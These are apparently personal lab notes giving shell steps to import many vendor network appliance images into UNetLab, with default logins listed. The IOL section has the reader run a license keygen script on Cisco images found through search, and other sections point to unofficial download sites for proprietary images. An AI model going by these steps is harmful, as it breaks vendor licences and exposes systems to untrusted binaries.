https://downloads.f5.com/esd/serveDownload.jsp?path=/big-ip/big-ip_v12.x/12.0.0/english/virtual-edition_base-plus-hf1/&sw=BIG-IP&pro=big-ip_v12.x&ver=12.0.0&container=Virtual-Edition_Base-Plus-HF1&file=BIGIP-12.0.0.1.0.628.LTM.qcow2.zip
# mkdir -p /opt/unetlab/addons/qemu/bigip-12.0/
scp BIGIP-12.0.0.1.0.628.LTM.qcow2.zip into /opt/unetlab/addons/qemu/bigip-12.0/
# cd /opt/unetlab/addons/qemu/bigip-12.0/
# unzip BIGIP-12.0.0.1.0.628.LTM.qcow2.zip
# rm BIGIP-12.0.0.1.0.628.LTM.qcow2.zip
# mv BIGIP-12.0.0.1.0.628.LTM.qcow2 hda.qcow2

# /opt/unetlab/wrappers/unl_wrapper -a fixpermissions

-to install brocadevadx
# mkdir -p /opt/unetlab/addons/qemu/brocadevadx-3100
# scp SSR3100ESX_EVAL.zip into /opt/unetlab/addons/qemu/brocadevadx-3100
# cd /opt/unetlab/addons/qemu/brocadevadx-3100
# unzip SSR3100ESX_EVAL.zip
# tar xf SSR03100ESX.ova
# /opt/qemu/bin/qemu-img convert -f vmdk -O qcow2 SSR1000ESX-disk1.vmdk hda.qcow2
# /opt/unetlab/wrappers/unl_wrapper -a fixpermissions

Make sure console is vnc in unl file.

# cat /opt/unetlab/labs/LAB.unl

logout and relogin from web gui

-to install cda
open ESXi and prepare cda vm with minimum spec
OS: Windows 2003, 2008, 2008R2, 2012, 2012R2
Disk Size: 120GB
RAM: 2GB
CPU: 2 virtual core
NIC: 1pc
See p2-2

Click to access cda10.pdf

Download and install cda_1.0.0.011.i386.iso
see p2-12 pdf above
shutdown vm
ssh as root into unetlab
# mkdir -p /opt/unetlab/addons/qemu/cda-1.0
ssh as root into ESXi
# cd /vmfs/volume/datastore1/cda
# scp *vmdk root@10.0.20.71:/opt/unetlab/addons/qemu/cda-1.0
ssh as root to unetlab server
# cd /opt/unetlab/addons/qemu/cda-1.0
# /opt/qemu/bin/qemu-img create -f qcow cda-flat.vmdk hda.qcow2
# /opt/unetlab/wrappers/unl_wrapper -a fixpermissions

-to install cips
# mkdir -p /opt/unetlab/addons/qemu/cips-4240
scp IPS-4240.ova into /opt/unetlab/addons/qemu/cips-4240
# cd /opt/unetlab/addons/qemu/cips-4240
# tar xf IPS-4240.ova
# /opt/qemu/bin/qemu-img convert -f vmdk -O qcow2 IPS-4240-disk1.vmdk hda.qcow2
# /opt/qemu/bin/qemu-img convert -f vmdk -O qcow2 IPS-4240-disk2.vmdk hdb.qcow2
# /opt/unetlab/wrappers/unl_wrapper -a fixpermissions
when you start cips for first time
L: cisco
P: cisco

-to install clearpass
scp CPPM-VM-x86_64-6.7.0.101814-ESX-ovf.zip into /tmp
# mkdir -p /opt/unetlab/addons/qemu/clearpass-6.7.0
# cd /tmp
# unzip CPPM-VM-x86_64-6.7.0.101814-ESX-ovf.zip
# cd CPPM-VM-x86_64-6.7.0.101814-ESX
# /opt/qemu/bin/qemu-img convert -f vmdk -O qcow2 CPPM-VM-x86_64-6.7.0.101814-ESX-CP-VA-disk1.vmdk /opt/unetlab/addons/qemu/clearpass-6.7.0/hda.qcow2
# cd /opt/unetlab/addons/qemu/clearpass-6.7.0
# /opt/qemu/bin/qemu-img create -f raw hdb.qcow2 80G
# /opt/unetlab/wrappers/unl_wrapper -a fixpermissions

-to install cnMaestro
download cnMaestro on-premise
https://www.cambiumnetworks.com/products/management/cnmaestro/
# mkdir -p /opt/unetlab/addons/qemu/linux-cnmaestro
scp cnmaestro-on-premises_2.1.0-r22_amd64.ova /opt/unetlab/addons/qemu/linux-cnmaestro
# cd /opt/unetlab/addons/qemu/linux-cnmaestro
# tar xvf cnmaestro-on-premises_2.1.0-r22_amd64.ova
# /opt/qemu/bin/qemu-img convert -f vmdk -O qcow2 cnmaestro-on-premises_2.1.0-r22_amd64-disk1.vmdk qcow2 hda.qcow2
# /opt/qemu/bin/qemu-img convert -f vmdk -O qcow2 cnmaestro-on-premises_2.1.0-r22_amd64-disk2.vmdk hdb.qcow2
# /opt/unetlab/wrappers/unl_wrapper -a fixpermissions

-to install coeus
# mkdir -p /opt/unetlab/addons/qemu/coeus-9.0.0.324
scp coeus-9-0-0-324-S100V.zip into /opt/unetlab/addons/qemu/coeus-9.0.0.324
# cd /opt/unetlab/addons/qemu/coeus-9.0.0.324
# unzip coeus-9-0-0-324-S100V.zip
# mv coeus-9-0-0-324-S100V/coeus-9-0-0-324-S100V-disk1.vmdk ..
# /opt/qemu/bin/qemu-img convert -f vmdk -O qcow2 coeus-9-0-0-324-S100V-disk1.vmdk virtioa.qcow2
# /opt/unetlab/wrappers/unl_wrapper -a fixpermissions
# vi /opt/unetlab/html/templates/coeus.php
change
$p[‘console’] = ‘telnet’;
to
$p[‘console’] = ‘vnc’;

-to install cpsg

NOTE: detailed instruction here
https://nbctcp.wordpress.com/2016/05/19/checkpoint-gaia-installation-on-unetlab/

download CheckPoint GAIA R77-30 iso

create cpsg-r7730 vm in ESXI with 30GB HD, 2GB RAM, 4 nics and Other Linux 64bit

1. Install Gaia on this system

press Enter

2. Keyboard Selection

click US and OK

3. Partitions Configuration

click OK

4. Account Configuration

Password:

Confirm:

click OK

5. Management Port

choose your manament nic

click OK

6. Management Interface (eth0)

IP address:

Netmask:

Default gateway:

click OK
7. Confirmation

click OK

Shutdown vm and export as ova

# mkdir -p /opt/unetlab/addons/qemu/cpsg-r7730

scp cpsg-r7730.ova into /opt/unetlab/addons/qemu/cpsg-r7730

# tar xf cpsg-r7730.ova

# /opt/qemu/bin/qemu-img convert -f vmdk -O qcow2 cpsg-r7730-disk1.vmdk hda.qcow2

# /opt/unetlab/wrappers/unl_wrapper -a fixpermissions

-to install csr
# mkdir -p /opt/unetlab/addons/qemu/csr1000v-universalk9.03.14.00.S.155-1.S
scp csr1000v-universalk9.03.14.01.S.155-1.S1-std.ova into /opt/unetlab/addons/qemu/csr1000v-universalk9.03.14.00.S.155-1.S
# cd /opt/unetlab/addons/qemu/csr1000v-universalk9.03.14.00.S.155-1.S
# tar xf csr1000v-universalk9.03.14.01.S.155-1.S1-std.ova
# /opt/qemu/bin/qemu-img convert -f vmdk -O qcow2 csr1000v_harddisk.vmdk hda.qcow2
# /opt/unetlab/wrappers/unl_wrapper -a fixpermissions

-to install cumulus
Download Cumulus VX for VMware from https://cumulusnetworks.com/cumulus-vx/download/
# mkdir -p /opt/unetlab/addons/qemu/cumulus-2.5.3
scp CumulusVX-2.5.3-4eb681f3df86c478.vmware.ova /opt/unetlab/addons/qemu/cumulus-2.5.3
# cd /opt/unetlab/addons/qemu/cumulus-2.5.3
# tar xf CumulusVX-2.5.3-4eb681f3df86c478.vmware.ova
# /opt/qemu/bin/qemu-img convert -f vmdk -O qcow2 CumulusVX-2.5.3-4eb681f3df86c478-disk1.vmdk hda.qcow2
# /opt/unetlab/wrappers/unl_wrapper -a fixpermissions

-to install extremexos
# mkdir -p /opt/unetlab/addons/qemu/extremexos-15.3.2.11
scp extremexosvm.zip /opt/unetlab/addons/qemu/extremexos-15.3.2.11
# cd /opt/unetlab/addons/qemu/extremexos-15.3.2.11
# unzip extremexosvm.zip
# /opt/qemu/bin/qemu-img convert -f vmdk -O qcow2 “EXOS_VM_15.3.2.11 sw1.vmdk” hda.qcow2
# /opt/unetlab/wrappers/unl_wrapper -a fixpermissions

-to install linux cyberoam

# cp linux-cyberoam.tar /opt/unetlab/addons/qemu/

# tar xf linux-cyberoam.tar

# /opt/unetlab/wrappers/unl_wrapper -a fixpermissions

Set

CPU: 1

RAM: 1024MB

Ethernet: 3

QEMU Nic: E1000

Console: vnc

-to install fortinet

NOTE:

We must download fortios KVM version not VMware version. The hd name must be virtioa not hda otherwise you will get country error

# mkdir -p /opt/unetlab/addons/qemu/fortinet-5.2.3b670

scp fortios_5-2-3.qcow2 into /opt/unetlab/addons/qemu/fortinet-5.2.3b670

# cd /opt/unetlab/addons/qemu/fortinet-5.2.3b670

# mv fortios_5-2-3.qcow2 virtioa.qcow2

# /opt/unetlab/wrappers/unl_wrapper -a fixpermissions

-to add log disk

# cd /opt/unetlab/addons/qemu/fortinet-5.6

create 500MB log disk size

# /opt/qemu/bin/qemu-img create -f raw virtiob.qcow2 500M

# /opt/unetlab/wrappers/unl_wrapper -a fixpermissions

on FortiGate

# get system status

Version: FortiGate-VM64-KVM v5.6.0,build1449,170330 (GA)

Virus-DB: 1.00123(2015-12-11 13:18)

Extended DB: 1.00000(2012-10-17 15:46)

IPS-DB: 6.00741(2015-12-01 02:30)

IPS-ETDB: 0.00000(2001-01-01 00:00)

APP-DB: 6.00741(2015-12-01 02:30)

INDUSTRIAL-DB: 6.00741(2015-12-01 02:30)

Serial-Number: FGVMEV0000000000

IPS Malicious URL Database: 1.00001(2015-01-01 01:01)

Botnet DB: 1.00000(2012-05-28 22:51)

License Status: Valid

Evaluation License Expires: Sun May 7 05:35:13 2017

VM Resources: 1 CPU/1 allowed, 995 MB RAM/1024 MB allowed

BIOS version: 04000002

Log hard disk: Need format

Hostname: FortiGate-VM64-KVM

Operation Mode: NAT

Current virtual domain: root

Max number of virtual domains: 1

Virtual domains status: 1 in NAT mode, 0 in TP mode

Virtual domain configuration: disable

FIPS-CC mode: disable

Current HA mode: standalone

Branch point: 1449

Release Version Information: GA

FortiOS x86-64: Yes

System time: Sat Apr 22 05:46:50 2017

FortiGate-VM64-KVM # execute formatlogdisk

Log disk is /dev/vdb.

Formatting this storage will erase all data on it, including

logs, quarantine files;

and require the unit to reboot.

Do you want to continue? (y/n)y

FortiGate-VM64-KVM # get hardware status

Model name: FortiGate-VM64-KVM

ASIC version: not available

CPU: QEMU Virtual CPU version 1.0

Number of CPUs: 1

RAM: 995 MB

Compact Flash: 2056 MB /dev/vda

Hard disk: 500 MB /dev/vdb

USB Flash: not available

NOTE:

https://forum.fortinet.com/tm.aspx?m=139301

Fortigate: You cannot create VDOMs, have a throughput limit, have some SSL limitation and has no Subscription signatures for IPS / App Control, AV, Web Filtering and Antispam.

You cannot try FortiGate HA with trial version because the trial VM has the same S/N of the other and the Cluster could not form

FortiManager / FortiAnalyzer: Limit of log per day or management devices

FortiADC (VM and D series): I believe that latest version only release the GUI after upload the license. The older versions has no limitation.

FortiWeb: There’s no signature update

FortiSandbox: Did not download the Windows VM’s

FortiAuthenticator: Limit the number of users in database

FortiMail: There’s no signature (antivirus) and no antispam (cloud)

-to install hpvsr
Download hpvsr from https://h10145.www1.hpe.com/Downloads/SoftwareReleases.aspx?ProductNumber=JG811AAE&lang=en&cc=us&prodSeriesId=5443163

# mkdir /opt/unetlab/addons/qemu/hpvsr-1001-CMW710
scp VSR1000_HPE-CMW710-E0325-X64.zip into /tmp
# cd /tmp
# unzip VSR1000_HPE-CMW710-E0325-X64.zip
# tar xf VSR1000_HPE-CMW710-E0325-X64.ova
# /opt/qemu/bin/qemu-img convert -f vmdk -O qcow2 VSR1000_HPE-CMW710-E0325-X64-disk1.vmdk /opt/unetlab/addons/qemu/hpvsr-1001-CMW710/hda.qcow2
# /opt/unetlab/wrappers/unl_wrapper -a fixpermissions

-to install iol
find in google these 3 files
i86bi_linux-adventerprisek9-ms.154-2.T4
i86bi_linux_l2-adventerprisek9-ms.156-0.9.S
CiscoIOUKeygen.py.zip

copy above files into /opt/unetlab/addons/iol/bin
# cd /opt/unetlab/addons/iol/bin
# mv i86bi_linux-adventerprisek9-ms.154-2.T4 i86bi_linux-adventerprisek9-ms.154-2.T4.bin
# mv i86bi_linux_l2-adventerprisek9-ms.156-0.9.S i86bi_linux_l2-adventerprisek9-ms.156-0.9.S.bin
# unzip CiscoIOUKeygen.py.zip
# python CiscoIOUKeygen.py
# mv iourc.txt iourc
NOTE: don’t use .iourc, otherwise it won’t run

-to import iou lab
SOURCE: http://www.unetlab.com/2015/06/importing-iou-web-labs/
download IOU-WEB from
http://certcollection.org/forum/topic/236548-iou-web-vm-v22-rsv5-ud-compilation-august-2014-new-links/page__hl__%20iou
Download, extract and import v22VMIOU2014 into VMware
Power on the vm and modify its ip address
# cat /etc/sysconfig/network-scripts/ifcfg-eth0
DEVICE=”eth0″
BOOTPROTO=”none”
NM_CONTROLLED=”yes”
ONBOOT=”yes”
TYPE=”Ethernet”
IPADDR=10.0.20.84
PREFIX=24
GATEWAY=10.0.20.1
DEFROUTE=yes
ONBOOT=yes

# service network restart
open web browser and go to http://10.0.10.84
click Downloads/database.sdb
scp database.sdb into unetlab server tmp

login as root into unetlab vm
# apt-get install php5-sqlite sqlite
# cd /opt/unetlab/scripts/
# wget https://raw.githubusercontent.com/dainok/unetlab/master/scripts/import_iou-web.php .
# chmod 755 /opt/unetlab/scripts/import_iou-web.php
# /opt/unetlab/scripts/import_iou-web.php /tmp/database.sdb
All labs will be imported under /opt/unetlab/labs/Imported

NOTE:

IOU assigns DCE/DTE on a per slot basis. Even slots are DTE, Odd slots are DCE

e.g. Slots 0, 2, 4.. = DTE; Slots 1, 3, 5.. = DCE

-to install ise
In ESXi import ISE-1.4.0.253-eval.ova
ssh as root to ESXi
# /vmfs/volumes/datastore1/ISE
# scp *vmdk root@10.0.20.71:/opt/unetlab/addons/qemu/ise-1.4.0.253
ssh as root to unetlab server
# mkdir -p /opt/unetlab/addons/qemu/ise-1.4.0.253
# cd /opt/unetlab/addons/qemu/ise-1.4.0.253
# /opt/qemu/bin/qemu-img convert -f qcow ISE-flat.vmdk hda.qcow2
# /opt/unetlab/wrappers/unl_wrapper -a fixpermissions

-to install mikrotik
Download latest chr vmdk from http://www.mikrotik.com/download
# mkdir /opt/unetlab/addons/qemu/mikrotik-6.34.3
scp chr-6.34.3.vmdk into /opt/unetlab/addons/qemu/mikrotik-6.34.3
# cd /opt/unetlab/addons/qemu/mikrotik-6.34.3
# /opt/qemu/bin/qemu-img convert -f vmdk -O qcow2 chr-6.34.3.vmdk hda.qcow2
# /opt/unetlab/wrappers/unl_wrapper -a fixpermissions
L: admin
P:

-to install nsvpx
# mkdir -p /opt/unetlab/addons/qemu/nsvpx-11.0.55.20
scp NSVPX-ESX-11.0-55.20_nc.zip into /opt/unetlab/addons/qemu/nsvpx-11.0.55.20
# /opt/qemu/bin/qemu-img convert -f vmdk -O qcow2 NSVPX-ESX-11.0-55.20_nc-disk1.vmdk virtioa.qcow2
# /opt/unetlab/wrappers/unl_wrapper -a fixpermissions

-to install olive
# mkdir -p /opt/unetlab/addons/qemu/olive-12.1R1.9
scp “Juniper JunOS Olive12.1R1.9 Virtualbox image.ova” into /opt/unetlab/addons/qemu/olive-12.1R1.9
# cd /opt/unetlab/addons/qemu/olive-12.1R1.9
# tar xf “Juniper JunOS Olive12.1R1.9 Virtualbox image.ova”
# /opt/qemu/bin/qemu-img convert -f vmdk -O qcow2 “JunOS Olive-disk1.vmdk” hda.qcow2
# /opt/unetlab/wrappers/unl_wrapper -a fixpermissions

-to install ostinato
Download ost-drone-0.7-v1.qcow2 from
http://www.bernhard-ehlers.de/projects/ostinato4gns3/install-qemu.html
# mkdir /opt/unetlab/addons/qemu/ostinato-0.7-v1
scp ost-drone-0.7-v1.qcow2 into /opt/unetlab/addons/qemu/ostinato-0.7-v1
# cd /opt/unetlab/addons/qemu/ostinato-0.7-v1
# mv ost-drone-0.7-v1.qcow2 hda.qcow2
# /opt/unetlab/wrappers/unl_wrapper -a fixpermissions

-to install paloalto
# mkdir -p /opt/unetlab/addons/qemu/PA-VM-ESX-7.0.1
scp PA-VM-ESX-6.1.0.ova into /opt/unetlab/addons/qemu/paloalto-7.0.1
# cd /opt/unetlab/addons/qemu/paloalto-7.0.1
# tar xf PA-VM-ESX-7.0.1 .ova
# /opt/qemu/bin/qemu-img convert -f vmdk -O qcow2 PA-VM-ESX-7.0.1-disk1.vmdk virtioa.qcow2
# /opt/unetlab/wrappers/unl_wrapper -a fixpermissions

NOTE:

PA in UNL no need license but no URL and threat signature updates, as well as fewer sessions through the firewall

-to install radware
SOURCE: http://www.unetlab.com/forum/viewtopic.php?f=7&t=39&sid=0ade6575a07ae6534a3fbce8dd7e3049
download alteon radware from https://www.radware.com/resources/softwaredownloads/network-admin-software/
Icon: Load Balancer.png
CPU: 2 (minimum)
RAM: 2560MB (minimum)
Ethernets: 3 (minimum)
console: VNC (since telnet won’t work)
# mkdir /opt/unetlab/addons/qemu/linux-radware
scp AlteonOS-30A-5-0-0.ova into /opt/unetlab/addons/qemu/linux-radware
# cd /opt/unetlab/addons/qemu/linux-radware
# tar xf AlteonOS-30-5-0-0.ova
# /opt/qemu/bin/qemu-img convert -f vmdk -O qcow2 AlteonOS-30.5.0.0-disk1.vmdk virtioa.qcow2
# /opt/unetlab/wrappers/unl_wrapper -a fixpermissions
Enter password: admin

-to install riverbed

download riverbed SteelHead VCX from https://www.riverbed.com/id/forms/trial-downloads/data-center-CX-255V-trial.html

# mkdir /opt/unetlab/addons/qemu/riverbed-vcx9.2.0/

scp image_rbt_vcx_9_2_0_n8_x86_64.ova into /opt/unetlab/addons/qemu/riverbed-vcx9.2.0/

# cd /opt/unetlab/addons/qemu/riverbed-vcx9.2.0/

# tar xf image_rbt_vcx_9_2_0_n8_x86_64.ova

# /opt/qemu/bin/qemu-img convert -f vmdk -O qcow2 image-vcx-disk1.vmdk virtioa.qcow2

# /opt/qemu/bin/qemu-img convert -f vmdk -O qcow2 image-vcx-disk2.vmdk virtiob.qcow2

# /opt/unetlab/wrappers/unl_wrapper -a fixpermissions

L: admin

P: password

NOTE:

disregard cdrom complain when booting

it will probably boot 2x when power on for the first time and will take around 15min to get login prompt

-to install Ruckus SmartZone

Ruckus vSZ High-Scale

vSZ High-Scale min requirement

RAM: 13GB

CPU: 2 Cores

# mkdir /opt/unetlab/addon/qemu/linux-ruckuswireless

scp vscg-3.4.1.0.208.ova into /opt/unetlab/addon/qemu/linux-ruckuswireless

# cd /opt/unetlab/addon/qemu/linux-ruckuswireless

# tar xf vscg-3.4.1.0.208.ova

# /opt/qemu/bin/qemu-img convert -f vmdk -O qcow2 vscg-3.4.1.0.208-disk1.vmdk hda.qcow2

# /opt/unetlab/wrappers/unl_wrapper -a fixpermissions

follow this

https://support.ruckuswireless.com/documents/812-vsz-getting-started-guide-for-smartzone-3-1-1/download

L: admin

P: admin

# setup

-to install sophos XG
download latest sophos XG KVM from https://secure2.sophos.com/en-us/products/next-gen-firewall/free-trial.aspx#
# mkdir -p /opt/unetlab/addons/qemu/sophos-16.05
scp VI-SFOS_16.05.3_MR-3.KVM-183.zip into /opt/unetlab/addons/qemu/sophos-16.05
# cd /opt/unetlab/addons/qemu/sophos-16.05
# unzip VI-SFOS_16.05.3_MR-3.KVM-183.zip
# mv PRIMARY-DISK.qcow2 hda.qcow2
# mv AUXILIARY-DISK.qcow2 hdb.qcow2
# rm VI-SFOS_16.05.3_MR-3.KVM-183.zip
# /opt/unetlab/wrappers/unl_wrapper -a fixpermissions
# cd /opt/unetlab/html/templates
# cp cpsg.php sophos.php
# sed -i ‘s/cpsg/sophos/g’ sophos.php
# sed -i ‘s/CP/sophos/g’ sophos.php
# cd ../includes
# vi init.php
add
‘sophos’ => ‘Sophos’,
after sterra line
LAN IP: 172.16.16.16 (default) port1
WAN IP: dhcp port2
WEB GUI: https://172.16.16.16:4444
L: admin
P: admin

-to install sourcefire
download from Cisco Cisco_Firepower_Management_Center_Virtual-6.1.0-330.qcow2
# mkdir -p /opt/unetlab/addons/qemu/sourcefire-6.1.0-330
scp Cisco_Firepower_Management_Center_Virtual-6.1.0-330.qcow2 into /opt/unetlab/addons/qemu/sourcefire-6.1.0-330
# cd /opt/unetlab/addons/qemu/sourcefire-6.1.0-330
# mv Cisco_Firepower_Management_Center_Virtual-6.1.0-330.qcow2 virtioa.qcow2
# /opt/unetlab/wrappers/unl_wrapper -a fixpermissions

-to install timos
# mkdir -p /opt/unetlab/addons/qemu/timos-12.0.R6
scp TiMOS-SR-12.0.R6-vm.zip into /opt/unetlab/addons/qemu/timos-12.0.R6
# cd /opt/unetlab/addons/qemu/timos-12.0.R6
# mv TiMOS-SR-12.0.R6-vm/vm/7xxx-i386/sros-vm.qcow2 hda.qcow2
# /opt/unetlab/wrappers/unl_wrapper -a fixpermissions

-to install titanium
# mkdir -p /opt/unetlab/addons/qemu/titanium-7
scp hda.qcow2 into /opt/unetlab/addons/qemu/titanium-7
# /opt/unetlab/wrappers/unl_wrapper -a fixpermissions

-to install Force10
download OS10_Virtualization_10.4.1.0V.zip from https://www.cocheno.com/category/routing/
# mkdir /opt/unetlab/addons/qemu/linux-dellos10-10.4.1.0
scp OS10_Virtualization_10.4.1.0V.zip into /opt/unetlab/addons/qemu/linux-dellos10-10.4.1.0
# cd /opt/unetlab/addons/qemu/linux-dellos10-10.4.1.0
# unzip OS10_Virtualization_10.4.1.0V.zip
# mv OS10-Installer-10.4.1.0.qcow2 virtiob.qcow2
# mv OS10-Disk-1.0.0.vmdk sataa.qcow2
# /opt/unetlab/wrappers/unl_wrapper -a fixpermissions

-to install vios
# mkdir -p /opt/unetlab/addons/qemu/vios-adventerprisek9-m-15.5
# mkdir -p /opt/unetlab/addons/qemu/viosl2-adventerprisek9-m-15.2
scp vIOS-L3.qcow2 into /opt/unetlab/addons/qemu/vios-adventerprisek9-m-15.5
scp vIOS-L2.qcow2 into /opt/unetlab/addons/qemu/viosl2-adventerprisek9-m-15.2
# cd /opt/unetlab/addons/qemu/vios-adventerprisek9-m-15.5
# mv vIOS-L3.qcow2 hda.qcow2
# cd /opt/unetlab/addons/qemu/viosl2-adventerprisek9-m-15.2
# mv vIOS-L2.qcow2 hda.qcow2
# /opt/unetlab/wrappers/unl_wrapper -a fixpermissions

-to install vmx
# mkdir -p /opt/unetlab/addons/qemu/vmx-1.0
scp vMX.ova into /opt/unetlab/addons/qemu/vmx-1.0
# cd /opt/unetlab/addons/qemu/vmx-1.0
# tar xf vMX.ova
# /opt/qemu/bin/qemu-img convert -f vmdk -O qcow2 vMX-disk1.vmdk hda.qcow2
# /opt/unetlab/wrappers/unl_wrapper -a fixpermissions
NOTE: to speed up vmx
http://noshut.ru/2015/09/how-to-run-juniper-vmx-in-unetlab/
# vi /opt/unetlab/html/templates/vmx.php
change
$p[‘qemu_options’] = ‘ -serial mon:stdio -nographic’;
to
$p[‘qemu_options’] = ‘ -serial mon:stdio -nographic -enable-kvm’;

-to install vnam
# mkdir -p /opt/unetlab/addons/qemu/vnam-6.1.1
scp nam-app-x86_64.6-1-1.ova and nam-app-x86_64.6-1-1.iso into /opt/unetlab/addons/qemu/vnam-6.1.1
# cd /opt/unetlab/addons/qemu/vnam-6.1.1
# tar xf nam-app-x86_64.6-1-1.ova
# /opt/qemu/bin/qemu-img convert -f vmdk -O qcow2 NAM-VX-6.1-disk1.vmdk hda.qcow2
# mv nam-app-x86_64.6-1-1.iso cdrom.iso
# /opt/unetlab/wrappers/unl_wrapper -a fixpermissions

From UnetLab gui, Start vnam icon
Main menu
1 – Download application image and write to HDD
2 – Download application image and reformat HDD
3 – Install application image from CD and reformat HDD
4 – Display software versions
5 – Reset application image CLI passwords to default
6 – Send Ping
f – Check for and fix file system errors on local disk
s – Show upgrade log
n – Configure network
r – Exit and reset Services Engine
h – Exit and shutdown Services Engine
Selection [123456fsnrh]:

NOTE:
I have black screen problem with vnam 6.2.1. So I use 6.1.1 instead
Any idea what to do next after do you see menu above?

-to install vsrx
# mkdir -p /opt/unetlab/addons/qemu/vsrx-12.1X46-D10.2-domestic
scp junos-vsrx-12.1X46-D10.2-domestic.ova into /opt/unetlab/addons/qemu/vsrx-12.1X46-D10.2-domestic
# cd /opt/unetlab/addons/qemu/vsrx-12.1X46-D10.2-domestic
# tar xf junos-vsrx-12.1X46-D10.2-domestic.ova
# /opt/qemu/bin/qemu-img convert -f vmdk -O qcow2 junos-vsrx-12.1X46-D10.2-domestic-disk1.vmdk hda.qcow2
# /opt/unetlab/wrappers/unl_wrapper -a fixpermissions

-to install vsrxng

NOTE:

for vSRX-NG can be downloaded here

http://www.juniper.net/support/downloads/?p=junosvfirefly-eval#sw

# mkdir -p /opt/unetlab/addons/qemu/vsrxng-151x49d406

scp media-vsrx-vmdisk-15.1X49-D40.6.qcow2 into /opt/unetlab/addons/qemu/vsrxng-151x49d406

# cd /opt/unetlab/addons/qemu/vsrxng-151x49d406

# mv media-vsrx-vmdisk-15.1X49-D40.6.qcow2 virtioa.qcow2

# /opt/unetlab/wrappers/unl_wrapper -a fixpermissions

-to install vwaas
download vwaas from
https://drive.google.com/folderview?id=0B-v2VUXWowDLYWRBcFJEcmtLQkE&usp=drive_web
# mkdir -p /opt/unetlab/addons/qemu/vwaas-200-5.5.3
scp virtioa.qcow2 into /opt/unetlab/addons/qemu/vwaas-200-5.5.3
# /opt/unetlab/wrappers/unl_wrapper -a fixpermissions
L: admin
P:

-to install vwlc
# mkdir -p /opt/unetlab/addons/qemu/vwlc-8.1.102.0
scp AIR-CTVM-K9-8-1-102-0.ova and AIR-CTVM-k9-8-1-102-0.iso into /opt/unetlab/addons/qemu/vwlc-8.1.102.0
# cd /opt/unetlab/addons/qemu/vwlc-8.1.102.0
# tar xf AIR-CTVM-K9-8-1-102-0.ova
# /opt/qemu/bin/qemu-img convert -f vmdk -O qcow2 AS_CTVM_8_1_102_0.vmdk hda.qcow2
# mv AIR-CTVM-k9-8-1-102-0.iso cdrom.iso
# /opt/unetlab/wrappers/unl_wrapper -a fixpermissions

-to install tinylinux
SOURCE: http://www.802101.com/2015/06/unetlab-ubuntu-guest-node.html

download tinylinux ova from http://virtuallymikebrown.files.wordpress.com/2012/02/dsl-4-4-10.doc

change dsl-4-4-10.doc to dsl-4-4-10.ova

ssh as root to unetlab server

# mkdir -p /opt/unetlab/addons/qemu/linux-dsl

# cd /opt/unetlab/addons/qemu/linux-dsl

scp dsl-4-4-10.ova into /opt/unetlab/addons/qemu/linux-dsl

# tar xf dsl-4-4-10.ova

# /opt/qemu/bin/qemu-img convert -f vmdk -O qcow2 DSL-4.4.10-disk1.vmdk hda.qcow2

# /opt/unetlab/wrappers/unl_wrapper -a fixpermissions

open UnetLab gui and add linux linux-dsl node
NOTE:
L: root

P: Password123!@#

-to install slitaz

download slitaz from

http://downloads.sourceforge.net/virtualboximage/slitaz-3.0-x86.7z

extract it in your pc

# mkdir -p /opt/unetlab/addons/qemu/linux-slitaz-3.0

scp slitaz-3.0-x86.vdi into /opt/unetlab/addons/qemu/linux-slitaz-3.0

# cd /opt/unetlab/addons/qemu/linux-slitaz-3.0

# qemu-img convert -f vdi -O qcow2 slitaz-3.0-x86.vdi hda.qcow2

# /opt/unetlab/wrappers/unl_wrapper -a fixpermissions
L: root
P: root

-to install win win7
SOURCE: http://www.802101.com/2015/06/windows-7-host-on-unetlab.html
install WIN7 in ESXi
update all patches
do not install vmware-tools
shutdown

ssh to ESXi server and cd to WIN7 directory
# cd /vmfs/volumes/datastore1/WIN7
# scp WIN7.vmdk root@10.0.20.71:/opt/unetlab/addons/qemu/win-win7
# scp WIN7-flat.vmdk root@10.0.20.71:/opt/unetlab/addons/qemu/win-win7

ssh as root to unetlab server
# cd /opt/unetlab/addons/qemu/win-win7
# /opt/qemu/bin/qemu-img convert -f vmdk -O qcow2 WIN7.vmdk hda.qcow2
# /opt/unetlab/wrappers/unl_wrapper -a fixpermissions
open UnetLab gui and add win win-win7 node

-to install xrv
# mkdir -p /opt/unetlab/addons/qemu/xrv-k9-5.2.2
scp hda.qcow2 into /opt/unetlab/addons/qemu/xrv-k9-5.2.2
# /opt/unetlab/wrappers/unl_wrapper -a fixpermissions

-to install vyos

download latest vyos from http://mirror.symnds.com/software/vyatta/iso/release/1.1.7/vyos-1.1.7-amd64-signed.ova

copy to unetlab

# mkdir -p /opt/unetlab/addons/qemu/vyos-117

scp vyos-1.1.7-amd64-si gned.ova into /opt/unetlab/addons/qemu/vyos-117

# cd /opt/unetlab/addons/qemu/vyos-117

# tar xf vyos-1.1.7-amd64-signed.ova

# /opt/qemu/bin/qemu-img convert -f vmdk -O qcow2 VyOS-1.1.7-signed-disk1.vmdk hda.qcow2

# /opt/unetlab/wrappers/unl_wrapper -a fixpermissions

L: vyos

P: vyos

-to install zeroshell
SOURCE: http://www.802101.com/2015/08/running-zeroshell-in-unetlab.html
Download zeroshell iso from http://www.zeroshell.org/download/#
# mkdir -p /opt/unetlab/addons/qemu/linux-zeroshell
scp ZeroShell-3.3.2.iso into /opt/unetlab/addons/qemu/linux-zeroshell
# cd /opt/unetlab/addons/qemu/linux-zeroshell
# mv ZeroShell-3.3.2.iso cdrom.iso
# /opt/qemu/bin/qemu-img create -f qcow hda.qcow2 5G
# /opt/unetlab/wrappers/unl_wrapper -a fixpermissions
I then added a new node to a test lab I had on the go, and fired it up. Once connected via VNC, you can then install it to the hard drive, by selecting option A from the menu:
Just accept all the defaults
# mv cdrom.iso ZeroShell-3.3.2.iso
from unetlab gui stop the node and start again

-to upgrade VMware-Tools
mount iso on datastore
click CD-ROM icon on ESXi console
click CD DVD drive 1/Connect to iso image on a datastore
open vmimages/tools-isoimages/linux.iso
# mkdir /mnt/cdrom
# mount /dev/cdrom /mnt/cdrom/
# tar xzvf /mnt/cdrom/VMwareTools-9.10.0-2476743.tar.gz -C /tmp/
# cd /tmp/vmware-tools-distrib
# perl vmware-install.pl
Do you still want to proceed with this legacy installer? [yes]
Uninstallation of previous install failed. Would you like to remove the install DB? [no] yes
# perl vmware-install.pl -d

-Log location
# cat /opt/unetlab/data/Logs/

WINDOWS:

-download and install UltraVNC from http://www.uvnc.com/downloads/ultravnc.html

-download and install Wireshark from https://www.wireshark.org/download.html

-download and extract http://UNLip/files/windows.zip

copy UNetLab into c:\Program Files

